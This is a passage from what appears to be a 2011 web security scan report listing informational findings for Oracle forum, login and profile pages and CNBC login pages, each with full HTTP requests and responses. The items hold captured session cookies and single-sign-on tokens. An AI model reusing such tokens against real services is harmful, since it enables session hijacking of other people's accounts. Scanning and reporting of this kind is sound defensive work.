Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-efb6224f9f8ad100cccc06d67aaeea0a-29511"
Content-Type: text/plain
Content-Length: 29511
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

27.14. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/s_code_forums.js

Request

GET /forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-82e1f8bbd97835a17866085b364ebf72-5398"
Content-Type: text/plain
Content-Length: 5398
Date: Tue, 06 Sep 2011 16:13:17 GMT
Connection: keep-alive

/* Setting the s_account */
function s_setAccount(){
var s_account="";
var curUrl = location.href;
   
       if(curUrl.indexOf("-stage") != -1 ) {
               s_account = "oracledevall,oracledevforum1";
       }
...[SNIP]...

27.15. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/spacer.gif

Request

GET /forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:11 GMT
ETag: "5.5.30-c895ce2a9c0546d80965bd3eeafcf070-43"
Content-Type: text/plain
Content-Length: 43
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.............!.......,...........D..;

27.16. https://forums.oracle.com/forums/themes/english/resources/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/style.css

Request

GET /forums/themes/english/resources/style.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-454e44ddb000046027da50612f1e4157-45429"
Content-Type: text/plain
Content-Length: 45429
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding


/* --------------------------------------------- */
/* Global Jive Forums 5.x Stylesheet */
/* --------------------------------------------- */

/* ----------------------------------
...[SNIP]...

27.17. https://login.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /

Request

GET / HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:30 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Sun, 03 Dec 2006 16:39:34 GMT
ETag: "e000c-49-423b5e0c67d80"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/html

<script>
window.location="https://login.cnbc.com/index.jsp";
</script>

27.18. https://login.cnbc.com/cas/checkCasTicket

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/checkCasTicket

Request

GET /cas/checkCasTicket HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:30 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en
Content-Length: 118
Connection: close
Content-Type: text/xml;charset=ISO-8859-1

<?xml version="1.0" encoding="ISO-8859-1"?>


<cnbc-global-login-response>1</cnbc-global-login-response>

27.19. https://login.oracle.com/oam/server/sso/auth_cred_submit

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Content-Length: 2316
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNt
Gu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

v=v1.4&request_id=-1117423317593169810&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:28 GMT
Set-Cookie: OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXg116uHK6EVADUS1EHWFB01taYd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/
Content-Length: 2359

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

27.20. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:13 GMT
Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d
; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/
Content-Length: 3286

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

27.21. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/faces/profile/createUser.jspx

Request

GET /EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186570323291081,0)
Content-Length: 40292

<script id="scr10" type="text/javascript" src="/EndUser/jscripts/s_validation.js"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html d
...[SNIP]...

27.22. https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/faces/profile/findUsername.jspx

Request

GET /EndUser/faces/profile/findUsername.jspx HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195250452335963,0)
Content-Length: 8380

<script id="scr10" type="text/javascript" src="/EndUser/jscripts/s_validation.js"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html d
...[SNIP]...

27.23. https://myprofile.oracle.com/EndUser/images/fading-background.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/fading-background.png

Request

GET /EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
